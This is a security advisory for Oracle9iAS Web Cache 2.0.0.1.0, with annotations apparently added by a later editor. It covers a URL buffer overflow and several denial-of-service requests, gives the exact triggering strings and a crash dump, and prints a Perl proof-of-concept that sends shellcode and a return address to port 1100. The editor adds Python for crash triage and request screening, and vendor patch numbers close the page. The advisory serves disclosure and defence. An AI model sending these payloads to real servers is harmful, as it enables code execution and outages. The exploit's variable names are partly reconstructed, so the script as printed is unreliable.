Published: 2001-10-18
Updated: 2001-10-19
Affected systems: Oracle9iAS Web Cache/2.0.0.1.0
Description:
Oracle9iAS Web Cache/2.0.0.1.0 contains multiple security vulnerabilities that can lead to denial of service or a buffer overflow.
Oracle9iAS Web Cache exposes four services:
Port 1100 = incoming web cache proxy service
Port 4000 = administrative interface
Port 4001 = web XML invalidation port
Port 4002 = statistics port
Both of the following vulnerabilities affect all four services.
* Sending a URL request containing "/ + 'A' x 3095 + 'N' x 4" causes a buffer overflow; the Oracle9iAS Web Cache process terminates with the following state information:
<....snip>
State Dump for Thread Id 0x104
eax=00000c1d ebx=00000000 ecx=00000c1d edx=026f0041
esi=01baac86 edi=0040deb6
eip=4e4e4e4e esp=0632fe08 ebp=41414141 iopl=0
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00000216
<snip....>
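The register values in the dump above tell a triager how much of the crash the request controlled: EIP and EBP hold nothing but ASCII bytes from the request. The Python below is an added illustration, not code from the advisory or its authors; it parses the dump as copied from the page and maps each register value back to the bytes that filled it. The helper names (parse_register_dump, registers_from_input, triage) and the filler set b"AN" are the editor's choices.

```python
import re

# Register dump copied from the advisory's state dump (text from the page,
# not captured live).
STATE_DUMP = """State Dump for Thread Id 0x104
eax=00000c1d ebx=00000000 ecx=00000c1d edx=026f0041
esi=01baac86 edi=0040deb6
eip=4e4e4e4e esp=0632fe08 ebp=41414141 iopl=0
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00000216"""

# name=hex pairs; iopl=0 is matched too (1..8 hex digits).
REG_RE = re.compile(r"\b([a-z]{2,4})=([0-9a-f]{1,8})\b")

# Segment and flag registers are not loaded from stack data; skip them.
NON_DATA_REGS = {"cs", "ss", "ds", "es", "fs", "gs", "iopl", "efl"}


def parse_register_dump(text):
    """Return {register_name: int} for every name=hex pair in the dump."""
    return {name: int(value, 16) for name, value in REG_RE.findall(text)}


def as_ascii(value, width=4):
    """Show a register value as the little-endian bytes that filled it."""
    return value.to_bytes(width, "little").decode("latin-1")


def registers_from_input(regs, filler):
    """Registers whose every byte is one of the request filler bytes.

    Such a register was loaded wholesale from client-supplied data;
    EIP in that set means the saved return address was overwritten."""
    hits = {}
    for name, value in regs.items():
        if name in NON_DATA_REGS:
            continue
        raw = value.to_bytes(4, "little")
        if all(b in filler for b in raw):
            hits[name] = raw.decode("latin-1")
    return hits


def triage(dump_text, filler=b"AN"):
    """Summarise what the crash says about control of execution."""
    regs = parse_register_dump(dump_text)
    hits = registers_from_input(regs, filler)
    if "eip" in hits:
        verdict = "return address overwritten by request bytes"
    elif hits:
        verdict = "request bytes reached registers but not EIP"
    else:
        verdict = "no register filled from request bytes"
    return verdict, hits


if __name__ == "__main__":
    verdict, hits = triage(STATE_DUMP)
    print(verdict)
    for reg, text in sorted(hits.items()):
        print(f"  {reg} = {text!r}")
```

EIP holding 0x4e4e4e4e ('NNNN') and EBP holding 0x41414141 ('AAAA') line up with the reported request, '/' + 'A' x 3095 + 'N' x 4: the four trailing 'N' bytes landed on the saved return address and the 'A' bytes just before them on the saved frame pointer, which is what distinguishes a return-address overwrite from a plain fault when rating a crash report.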
* Sending a URL request longer than 3570 characters ('GET /<3571 x A> HTTP/1.0') makes the Oracle9iAS Web Cache process exit, without a heap overflow.
The following three denial-of-service attacks can cause the process to hang at 100% CPU; only a restart restores normal operation.
* Sending a request of about 3094 characters.
* Sending a request with more than 4000 characters in an HTTP header, for example:
'GET / HTTP/1.0' 'User-Agent: <4000 x A>'
* Sending the following request: 'GET /. HTTP/1.0' (affects only the web cache proxy and administrative interface services)
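The three hang conditions above and the two crashes before them are all visible on the wire in the size or shape of a single request. The Python below is an added example (not from the advisory, Defcom or Oracle) of the screening a fronting reverse proxy or IDS rule could apply to raw requests before they reach an unpatched cache. The 2048-byte thresholds are the editor's choice, set well below the smallest triggering sizes the advisory reports (about 3094 bytes of URL, 4000 bytes in one header), and the sample requests are constructed from the page's descriptions.

```python
# Thresholds chosen for this example, well below the smallest sizes the
# advisory reports as harmful (about 3094 bytes of URL; 4000 bytes in one
# header). They are not values from Oracle or from the advisory.
MAX_TARGET_LEN = 2048
MAX_HEADER_LEN = 2048

# Constructed sample requests modelled on the advisory's descriptions.
SAMPLES = {
    "benign": b"GET /index.html HTTP/1.0\r\nUser-Agent: Mozilla/4.0\r\n\r\n",
    "long_url": b"GET /" + b"A" * 3095 + b"N" * 4 + b" HTTP/1.0\r\n\r\n",
    "long_header": b"GET / HTTP/1.0\r\nUser-Agent: " + b"A" * 4000 + b"\r\n\r\n",
    "dot_target": b"GET /. HTTP/1.0\r\n\r\n",
}


def parse_request(raw):
    """Split a raw HTTP/1.0 request head into (method, target, version, headers).

    Returns None when the request line does not have exactly three tokens.
    Header values are kept as bytes so their length is measured as sent."""
    head = raw.split(b"\r\n\r\n", 1)[0].replace(b"\r\n", b"\n")
    lines = head.split(b"\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3:
        return None
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            headers.append((name.strip().decode("latin-1"), value.strip()))
    return parts[0].decode("latin-1"), parts[1], parts[2].decode("latin-1"), headers


def screen_request(raw, max_target=MAX_TARGET_LEN, max_header=MAX_HEADER_LEN):
    """Return the list of advisory patterns a request matches (empty = pass)."""
    parsed = parse_request(raw)
    if parsed is None:
        return ["malformed request line"]
    _method, target, _version, headers = parsed
    findings = []
    # Oversized request-target: covers the ~3094-byte hang, the 3095+4
    # overflow and the 3571-byte process exit in one check.
    if len(target) > max_target:
        findings.append(f"request-target length {len(target)} exceeds {max_target}")
    # Oversized single header value (the User-Agent case in the advisory).
    for name, value in headers:
        if len(value) > max_header:
            findings.append(f"header {name} length {len(value)} exceeds {max_header}")
    # The one shape-based trigger: a bare "/." path.
    if target == b"/.":
        findings.append("request-target '/.' (advisory: hangs cache proxy and admin interface)")
    return findings


def screen_all(samples=SAMPLES):
    """Screen every sample; handy for a quick run and for tests."""
    return {label: screen_request(raw) for label, raw in samples.items()}


if __name__ == "__main__":
    for label, findings in screen_all().items():
        print(f"{label:12s} -> {findings or 'pass'}")
```

Screening like this is a stopgap that buys time and gives a log trail of attempts; the vendor patches listed under Recommendation below are the actual fix.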
<* Source: George Hedfors (george.hedfors@defcom.com)
Andreas Junestam (andreas.junestam@defcom.com)
Reference: http://archives.neohapsis.com/archives/bugtraq/2001-10/0134.html
*>
Test program:
Warning
The following program (method) may be offensive in nature and is provided solely for security research and teaching purposes. Use at your own risk!
andreas junestam (andreas.junestam@defcom.com) provided the following test code:
#########################################################################
#
# Proof-of-concept exploit for Oracle9iAS Web Cache/2.0.0.1.0
# Creates the file c:defcom.iyd
# By andreas@defcom.com (C)2001
#
#
# Since we do not control the space after what ESP points to, I was lazy
# and did a direct buffer jump. So, if it does not work, try changing
# the return address(start of buffer in mem) to one that fits your system.
# The buffer starts at 0x05c5f1e8 on my box(WIN2K prof SP2).
# /andreas
#
#########################################################################
# The page's rendering dropped every "$" sigil and variable name from this
# script; the variable names below are reconstructed and are not the author's.
# "$0" is restored in the usage text, which the page had expanded to its own
# CGI path.
use Socket;

$argc = @ARGV;
if ($argc != 1) {
    print "Usage: $0 <host>\n";
    print "Example: $0 127.0.0.1\n";
    exit;
}

my ($remote, $port, $iaddr, $paddr, $proto);
$remote = $ARGV[0];
$port   = "1100";                              # default port for the web cache
$iaddr  = inet_aton($remote)               or die "Error: $!";
$paddr  = sockaddr_in($port, $iaddr)       or die "Error: $!";
$proto  = getprotobyname('tcp')            or die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr)                      or die "Error: $!";

# Payload bytes exactly as published; the first string was split across two
# lines by the page ("\xc" / "9") and is rejoined here.
$sploit =
  "\xeb\x03\x5a\xeb\x05\xe8\xf8\xff\xff\xff\x8b\xec\x8b\xc2\x83\xc0\x18\x33\xc9";
$sploit = $sploit .
  "\x66\xb9\xb3\x80\x66\x81\xf1\x80\x80\x80\x30\x99\x40\xe2\xfa\xaa\x59";
$sploit = $sploit .
  "\xf1\x19\x99\x99\x99\xf3\x9b\xc9\xc9\xf1\x99\x99\x99\x89\x1a\x5b\xa4";
$sploit = $sploit .
  "\xcb\x27\x51\x99\xd5\x99\x66\x8f\xaa\x59\xc9\x27\x09\x98\xd5\x99\x66";
$sploit = $sploit .
  "\x8f\xfa\xa3\xc5\xfd\xfc\xff\xfa\xf6\xf4\xb7\xf0\xe0\xfd\x99";

# Pad the request path to 3096 bytes, then append the return address
# 0x05c5f1e8 (start of the buffer, little-endian). The padding byte literal
# did not survive on the page and is left as the empty string it rendered as.
$msg = "GET " . $sploit . "" x (3096 - length($sploit)) .
       "\xe8\xf1\xc5\x05" . " HTTP/1.0\n\n";
print $msg;
send(SOCK, $msg, 0) or die "Cannot send query: $!";
sleep(1);
close(SOCK);
exit;
Recommendation:
Vendor patch:
The vendor has released patches that fix these vulnerabilities; download them from the vendor's site: metalink.oracle.com
NT/WIN2K: Patch number 2044682
SUN Sparc Solaris: Patch number 2042106
HP-UX: Patch number 2043908
Linux: Patch number 2043924
Compaq Tru64 Unix: Patch number 2043921
IBM AIX: Patch number 2043917